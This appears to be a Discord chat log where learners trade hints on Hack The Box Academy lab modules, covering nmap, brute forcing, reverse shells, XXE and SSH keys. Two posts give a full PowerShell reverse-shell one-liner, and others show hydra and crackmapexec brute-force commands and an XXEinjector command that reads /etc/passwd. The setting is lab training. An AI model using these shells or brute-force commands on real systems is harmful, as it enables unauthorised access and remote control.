carmine trench
#

can someone help me with that?

elfin cedar
#

NSE is nmap script engine

carmine trench
#

ya i know, but i dont undrastend what do i need to find

upper lagoon
#

The flag

elfin cedar
#

probably use -Sc for scripts

upper lagoon
carmine trench
carmine trench
vital adder
carmine trench
#

one of the services is like one of the ports?

elfin cedar
#

omg I needed to put "http://" before the ip for the ffuz module

#

-sV is a good option for nmap too @carmine trench

carmine trench
#

i dont know what do i need to look for, like how does the flag looks like

elfin cedar
#

-sV will probe open ports to determine service/version info

#

the question is asking for a flag in one of the services, maybe something that looks odd

#

whats your command look like?

carmine trench
carmine trench
elfin cedar
#

you didnt use a script

upper lagoon
carmine trench
#

i dont know which script to use, there is a lot😫

elfin cedar
#

the script you wanna use is also in the module

#

should start with --script

upper lagoon
elfin cedar
#

ffuz ran like nothing was wrong

pale oriole
vital adder
#

send a screenshot of the command you run and the error that get

carmine trench
#

am i on to something?

obtuse verge
#

hi guys, im doing the windows pe module, and im in the pillaging section. Can someone give me a nudge about the last question ( i have the SAM, SYSTEM and Security, but i dont know why secretdumps doesnt work...)

elfin cedar
carmine trench
#

Ya

#

I think

#

Wait let me check

#

Um no I dont

#

I used -sV

#

Oh wait im dumb

elfin cedar
#

you want that too

carmine trench
elfin cedar
#

read the results

#

it gives you vulnerabilites you should check

#

there should be more below the screenshot right?

#

in your screenshot, the "http-slowloris-check:" is a vulnerability

#

there should be another

#

http-slowloris-check:
http-dombased-xss:
http-stored-xss:
http-enum:
http-csrf:

#

hope that makes sense

ivory sandal
#

Hey yall, im working on the new module for NTA, and im not sure what im doing wrong here. The question is this: Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer. I am using the filter: || arp.opcode == 1 && (eth.src == 08:00:27:53:0c:ba) || and I am getting the result || 507 || from the wireshark statistics page, but that is not the answer?

pale oriole
acoustic owl
#

Why is Intermediate Network Traffic Analysis easy while Intro to Network Traffic Analysis is medium?

vital adder
#

someone at HTB make an oopsie woopsie

vital adder
#

*working fine for me

ivory sandal
#

Earlier Today

sly kelp
#

Good

vital adder
#

the first screenshot is clearly a connection error so the target smb may have crashed try reset your target

#

and on the second screenshot that user is active but doesn't have rdp (that user is for other services)

#

yep

vital adder
#

for RDP i used hydra

hydra -L username.list -P password.list -f rdp://10.129.6.188 -t 4
alpine ridge
#

yo guys anyhelp with the active subdomain enumeration lab, im on the question where you have to submit the contents of the txt record. i got chatgpt to write me bash script to iterate through the list of domains i got ealier on but i keep getting no txt record found any push in the right direction much appreciated

vital adder
#

i think it's the threads

vital adder
#

and hint on question do a dns zone transfer and look for ||domain which similar ips||

alpine ridge
zinc marsh
#

slowloris attack is to take down the ip

zinc marsh
carmine trench
#

Im so confused with this module like there is bunch of stuff that i need to use to get an answer but they dont mansion it in the module

vital adder
#

which module and section are you on?

carmine trench
zinc marsh
#

not a module

carmine trench
#

Im in the nmap module right now

elfin cedar
zinc marsh
vital adder
#

@carmine trench if you are on the Nmap Scripting Engine section of the nmap module then you and the other guy has completely gone off of track a while back

zinc marsh
#

to check for scripts

zinc marsh
vital adder
carmine trench
vital adder
#

spoiler for god sake

elfin cedar
#

well you said it has nothing to do with it

#

so which is it

vital adder
#

no idea how or why you got the file with the vuln scipt

elfin cedar
#

--script vuln lists all the vulnerabilities

carmine trench
# zinc marsh

But why did you searched http? And not ssh or xss or something like that

zinc marsh
#

u sent a ss of http service

carmine trench
#

Ya but i got much more things too

#

I sent it because i saw something with dos

zinc marsh
#

then search it

carmine trench
#

Im lost😭

zinc marsh
#

then read the section again

carmine trench
#

I read it twice dude and im still lost

#

Networking is so confusing ong

zinc marsh
elfin cedar
#

use --script vuln

zinc marsh
#

if he doesn't even know what is that for

elfin cedar
#

and shows where the flag is

carmine trench
obtuse fiber
#

Hey all, I need a nudge in the below if possible
Module: Password Attacks
Chapter: Password Attacks Lab - Hard
Issue: I'm trying to brute force J using the following commands (in the same time) but it's taking a long time which making me doting that I'm on the wrong track
||crackmapexec winrm IP -u "J" -p mut_password.list --local-auth||
||crackmapexec winrm IP -u "j" -p mut_password.list --local-auth||
||crackmapexec winrm IP-u "J" -p password.list --local-auth||
||crackmapexec winrm IP -u "j" -p password.list --local-auth||

vital adder
#

hint try ||RDP||

obtuse fiber
vital adder
#

got j in my note so go for that first

#

also this should only take 2-3 min max

zinc marsh
#

it doesn't care

obtuse fiber
obtuse fiber
vital adder
obtuse fiber
vital adder
carmine trench
#

Ohhhh

vital adder
#

even though nmap is literally the last tool i would used for a web server but hint try to look for scrip that is for enum first

carmine trench
#

Got ya

vital adder
#

and like the other guy said the vuln script in theory could work but it's just a script that run other script so if you don't even know what a script does there is almost no point of running it just to get the answer

#

but in your previous screenshot i'm guessing that didn't work

zinc marsh
#

mount ur own vm

#

u will need it soon or later

elfin cedar
vital adder
#

so it's could be that he got the answer all of this time 🤣

zinc marsh
#

without even knowing what he was doing

obtuse fiber
#

I reached 800 of 94045

vital adder
#

hint you are close to the cred

obtuse fiber
vital adder
#

nice 👍

azure shell
#

@elfin cedar which tools do you use to search for xss, crsf, stored xss enum

vital adder
barren apex
#

unless you have -v on i belive it does

simple pine
#

I'm cracking on through the teir 0 modules of the academy

barren apex
#

im not sure what module your doing but hyrda RDP is a little funny when you start putting a lot of threads on,

pulsar needle
#

I finally got script kiddie

#

😎

burnt sluice
#

hello everyone, I want to ask about the Attacking Common Applications Module.

#

In the PRTG Network Monitor section's questions it is said that I can get a reverse shell, I've tried different ways to obtain one but i couldn't

#

i used this powershell one liner:
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.149',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
But when i get the rev shell it isn't responsive

#

and then it just disconnects.

#

I thought abt it being terminated by the App itself, which might be viable, but it doesn't make a lot of sense

fathom pendant
burnt sluice
#

yes, it didn't work at all

#

i checked the spelling and everything

ivory sandal
#

Is anyone here doing the new Network Traffic module?

burnt sluice
#

i will try to make a rev shell file and download it on the machine, I'll see what turns up

acoustic owl
burnt sluice
gray sigil
#

"Submit the broadcast address of the following CIDR: 10.200.20.0/27"

Super confused on how the answer is 31. Anyone able to ELI5?

#

reread the section 2 times now and it's just not clicking

burnt sluice
#

if u calculate the range of this subnet, you will get the following:
Network Address: 10.200.20.0
Hosts: 10.200.20.1 - 10.200.20.30
BC Address: 10.200.20.31
Every subnet contains 32 hosts, subtracting both the network address and the BC u get 30 usable address.
The BC address is a special type of address, so it's reserved in the last usable address in the subnet.

barren apex
#

I would have a look at how networks and subnets work using XOR online somewhere and then once you have got your head round whats happening theres lots of cheat sheets online to refer to quicklu

gray sigil
#

Think my brain is just too worn out to continue learning today... even that simple explanation is just beyond my comprehension right now.

Thank you for explaining, I'll come back tomorrow and try to see if my brain isn't melted ice cream then.

drifting glacier
#

Hy all, quick question on the SQL Operators lab in the SQL injection fundamentals section, currently banging my head against the wall on trying to craft a query that does not include 'engineer' in the title at all

#

Thought i had it, but titles that still include engineer are returning, but titles with only engineer in it are excluded. Any sort of nudge one can provide?

#

Here is an example query ive tried but hasn't worked:

tulip parrot
#

I have the same issues

#

Hello everybody

gray sigil
drifting glacier
tulip parrot
barren apex
#

DM me

gray sigil
#

Ah. So it just begins at the host... duh. Right. Sorry, my brain really is just trashed right now lol

barren apex
gray sigil
tulip parrot
# tulip parrot

for those who are searching, I used this powershell oneliner with no error: $client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

#

thx i dont know so much about Discord

burnt sluice
# drifting glacier

The question specifies two conditions to meet, one is that the employee number is greater than 10000 or their title doesn't contain engineer

#

so crafting the first condition will be a simple greater than operator, then comes the OR part, then you craft the doesn't contain engineer part.
It's mentioned in the previous section how to search for a specific word using the LIKE clause.
check that again and if u didn't figure it out I'll be happy to assist

burnt sluice
carmine trench
#

guys, what is the best module to start with if im new to cyber?
(i wish i asked it earlier because i already start with basic toolset, but i still want know what my next module will be)

burnt sluice
#

hello everyone, quick question for those who finished the attacking common apps module, im stuck at the gitlab Enum section question, where they want me to enumerate the version number, i found the version number througout the help page, but it's incorrect, if anyone can nudge me in the right direction it would be appreciated

burnt sluice
#

then from there im pretty sure you'll figure ur way around

burnt sluice
burnt sluice
#

i think you're better off asking on #boxes

#

that happened as well....

cerulean willow
burnt sluice
#

oke oke, goodluck

fresh pine
#

Anybody can tell me why I can't find the 0000000000003000 | MAP | -RW-- in "Attacking Thick Client Applications"? It's driving me nuts 💀

#

@slender shoal What do you mean? Isn't this as they explain it 🥺

high reef
#

hey

#

i'm doing the passord attacks. Module Attacking Active Directory & NTDS.dit

#

i'm given an IP but no creds to login to enumerate the service

#

any idea what i'm suppose to do

tight mesa
#

hello anyone can let me know if the cracked Kira's passwd changed?, cuz I'm trying to connect as described on the question in Protected files at Password Attack module?

modern falcon
tight mesa
#

ok.

high reef
gloomy bramble
pine dagger
tight mesa
#

I did it but, the weird thing is I found the same password as previous.... trying 1 + time with other dictionary

pine dagger
#

Combination of both iirc

burnt sluice
#

hello everyone, I have a question regarding the Attacking Common Apps module, Section Attacking CGI Apps - ShellShock.
In the section it mentions that the User-Agent Header is vulnerable to command injection, but it doesn't show how did we get to that or how to enumerate it effectively, if anyone has a blog or a guide or anything that might help with understanding how we got to this.

pine dagger
west night
#

Hi @fathom pendant. Regarding the question in Attacking Common Services easy lab "You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer." I tried the following:

  1. Used the smtp-user-enum tool and found a username starting with f.
  2. found what appeared to be default credentials, first tried to login with them using mysql but was not successful an error appeared citing that the password field was empty.
  3. tried brute forcing each username found with the password list provided in the resources section on the ftp and mysql ports but this was also unsuccessful.

I saw the mysql reverse shell discussion and correctly if I am wrong. I need to be authenticated before attempting this? or does it work straight from the url bar? Any hints would be appreciated 🙂

burnt sluice
gloomy bramble
pine dagger
burnt sluice
#

i was asking if someonoe does know a blog or a guide, it doesn't mean im not doing my own research, uk u could've just ignored my question and went on :)

gloomy bramble
dull thunder
#

does anyone have any expienence with kubeletctl ? i get this error when running it. Error: unknown flag: --certificate-authority

#

the command im running is:

onyx dust
#

Hello. I am working on the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat module. My problem is with Question 1: Perform MIC cracking using the attached .cap file. I have followed the instructions in the module. I used cap2hccapx.bin to create a file with the handshakes called mic_to_crack.hccapx. I used hashcat, with -m 22000, to crack it. But hashcat always exhausts.

Any tips on what I'm doing wrong? I'm using pwnbox, not kali.

#

hashcat version is 6.1.1.

tight mesa
#

my apologies, u were right..!!!

clear mason
tight mesa
#

crack Kira passwd

onyx dust
clear mason
onyx dust
clear mason
#

i have a bad memory but i remember this cuz after i figured it out i told support about it that it didn't working unless i used that one

fathom pendant
onyx dust
clear mason
#

Hashcat with -m 2500

onyx dust
clear mason
#

Dm me mate

#

as i said i have very bad memory but we can figure it out hopefully i have the message i sent to support

#

hello i am on WEB ATTACKS module on Blind Data Exfiltration
room trying to use XXEinjector but its not working with me

ruby XXEinjector.rb --host=127.0.0.1 --httpport=8080 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

keep giving me

[-] Specified TCP ports already in use.

i am using python http.server to listen can someone help me tell me what i am doing wrong

fathom pendant
#
Like this
clear mason
#

my bad

fathom pendant
#

It's alright

burnt sluice
#

quick question

#

how can i freeze the memory map in x64dbg, the memory map keeps changing and i couldn't figure out how to catch the memory to dump it.

#

if anyone has any experience with it it'll be appreaciated

#

appreciated**

#

I'm stuck at it unable to dump the memory.

#

this is rly frustrating ngl

torn steppe
#

hello I would appreciate any hint to start hard lab of attacking common services, I tried to brute force with different list but no result, any hint?

elfin cedar
#

I feel so stupid

#

What am I missing?

#

when I try to ssh I get the error: Permission denied (publickey)

#

I have the password but why isn't is prompting me for it?

fathom pendant
#

It's not an error, just a message

elfin cedar
#

hey!

#

but even for this??

soft dagger
#

hi

#

in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

clear mason
fathom pendant
elfin cedar
#

in the login brute forcing module??

#

ssh b.gates@94.237.56.76
The authenticity of host '94.237.56.76 (94.237.56.76)' can't be established.
ED25519 key fingerprint is SHA256:j+yt/5KEcd5ONU/344Wjh/R90Vl8/QvaNaLalC7+48k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.56.76' (ED25519) to the list of known hosts.
b.gates@94.237.56.76: Permission denied (publickey).

soft dagger
#

it will then work

#

once you get these keys, do this

elfin cedar
#

but the module doesnt even mention this

soft dagger
#

I know

elfin cedar
#

omg

#

its rigged man

soft dagger
#

i have the same problem in the password attacks moduke

#

not everything is available

#

anyone have a small hint concerning this question: in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

proud pine
# elfin cedar its rigged man

The modules expect some familiarity with linux environments - you should already have a grasp of the fundamentals before starting.

elfin cedar
soft dagger
#

respectful 👍

elfin cedar
#

so whenever you ssh into something, you need more than just a password everytime?

#

I will have to go back and redo the ssh module to refresh, I took like 2 weeks off I was losing my mind

torn steppe
#

when you have id_rsa you can specify in the ssh command with -i and try with root username

soft dagger
#

anyone have a small hint concerning this question: in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

torn steppe
#

ssh has more than one method of autentication

soft dagger
#

anyone have a small hint concerning this question: in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

#

😆

torn steppe
#

my message sir

#

when you have id_rsa you can specify in the ssh command with -i and try with root username

#

if you have a valid private key...

soft dagger
#

yea, i have a key for the user jason

#

on;y

#

only

torn steppe
#

you can use it for root...

soft dagger
#

you mean like this ssh root@ip -i id_rsa

torn steppe
#

yeah

#

remember id_rsa must have 600 permision

soft dagger
#

wait seconds

soft dagger
torn steppe
#

Need help for the hard lab of attacking common services...

soft dagger
#

my friend

#

sorry

#

i think the id_rsa for jason

#

it was for mike

#

so the question is how can i get the id_rsa from the target machine

#

i just has the known_hosts

#

jason@skills-medium:~/.ssh$ ls
known_hosts

#

are you still there

#

??

fathom pendant
#

Do ls -la

soft dagger
#

done

#

have .ssh\

#

nothing found

fathom pendant
elfin cedar
#

ITS RIGGED

fathom pendant
soft dagger
#

yes

#

i just have known_hosts

fathom pendant
#

Hmm

#

I dont have my notes atm

#

Give me a min

soft dagger
#

okay

tidal mango
#

which module?

soft dagger
#

in password attacks module, in the medium lab section

#

think outside the box 😂

tidal mango
#

which part of the medium lab?

fathom pendant
#

You say you are j*

#

Yes?

soft dagger
#

yes

elfin cedar
#

😭

soft dagger
tidal mango
fathom pendant
#

Read the documentation that you got the password from carefully

soft dagger
#

no puzzles please

fathom pendant
#

It tells you a service which should be running

soft dagger
#

i have three days thinking]

#

mysql

fathom pendant
soft dagger
#

i know

#

but how

fathom pendant
#

Wdym how

#

It's accessible internally

#

Literally my notes reflect what path I took to escalate to root

soft dagger
#

my friend, i don't have all tools, i mean i don't have all information

fathom pendant
#

Sir

tidal mango
#

check out your mysql idea

fathom pendant
#

You have the foothold as jason

soft dagger
#

yea

fathom pendant
#

And you know the next service to look at

#

So start there

#

:)

soft dagger
#

okay, wait

#

what is the cmd should i use

fathom pendant
#

How did the module teach you to connect to mysql

#

(Also looking at the history should show how this user tends to connect to it)

soft dagger
#

wait history of the user jason?

fathom pendant
#

Yes

#

I believe that's an alternative way of finding out

soft dagger
#

which section mentions how to use mysql

#

in this module

fathom pendant
#

Sorry it's a previous module, footprinting, that refers to it

#

Either way Google is also a free resource to figure it out

soft dagger
#

yes, i didn't open this module till now, so i can't read it

fathom pendant
#

But the syntax would be
mysql -u $username -p

fathom pendant
soft dagger
#

random

#

also i don't think that there a big diffrence

#

in my opinion

#

👍

#

mysql --user=user_name --password db_name from another source

fathom pendant
#

Yes but since it's internal, you don't need to specify the db_name

#

-u is short for --user and -p is short for --password

#

Cpts path takes you through some basics modules before reaching this point

#

As mysql is a fairly basic/common service it's fairly well documented

tidal mango
#

follow the path, you will have much easier time overall

soft dagger
#

Cpts path: could you tell me the full name of the path

#

as i have skills and job paths

#

which one

tidal mango
soft dagger
#

really

fathom pendant
#

Yes

soft dagger
#

um

#

okayyy

tidal mango
#

I would recommend the bug bounty path first as it ties and and shares modules

fathom pendant
#

Eh it depends

#

Tbh

#

I mean if their goal is just unaimed learning its really just up to them

#

You can do them in any order

#

The path is just structured for easier learning

tidal mango
# fathom pendant Tbh

True, there is actually some super helpful stuff at the begining of the CPTS path as well

soft dagger
#

mysql> SHOW databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| users |
+--------------------+
2 rows in set (0.00 sec)

#

this is what i get

#

right?

#

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| users |
+--------------------+
2 rows in set (0.00 sec)

mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql>

#

what is the problem here

soft dagger
#

hi

#

anyone here

#

hiiiii

fiery berry
# soft dagger what is the problem here

nothing, just make a query to read the data in the "users" table. There is a module called "SQL fundamentals" if I'm right and I don't know if you did it already

soft dagger
#

how

#

as there is no somthing like this

#

SQL Injection Fundamentals This is the name of the module

soft dagger
#

i reviwed it, but there is nothing

#

okay, done

soft dagger
#

MANY THANKS TO "MarcieLee", "CrazyHorse302", and "autom4il" for their help 👍

#

BAN from what

#

your email is banned

#

if this, then the only way is to contact with the technical support

autumn pilot
#

reduce the caps usage

#

if it has nothing to do with HackTheBox, please reach out to the appropriate game representatives

soft dagger
#

sorry, what is that exprience

#

??

#

🤔

#

oh its a game

final maple
#

I'd like help on the Attacking Thick Client Applications module. Am I supposed to delete the parts of the .bat file that delete the files that are created? If so, how do I do that? The module just says "We can try to retrieve the content of the 2 files, by modifying the batch script and removing the deletion." But it does not say how to modify the batch script. Also, when I load the Restart-OracleService.exe into the debugger, I am not finding the "the map with a size of 0000000000003000 with a type of MAP and protection set to -RW--." Why am I not finding it?

trail leaf
#

open the batch script in notepad

final maple
trail leaf
#

Probably not, I'd have to open the whole lab again to try and troubleshoot it but I don't have time right now 😅

#

That entire section is based on PivotAPI, so if the instructions in Academy don't make sense, watch the ippsec video on it or read the 0xdf writeup about it

final maple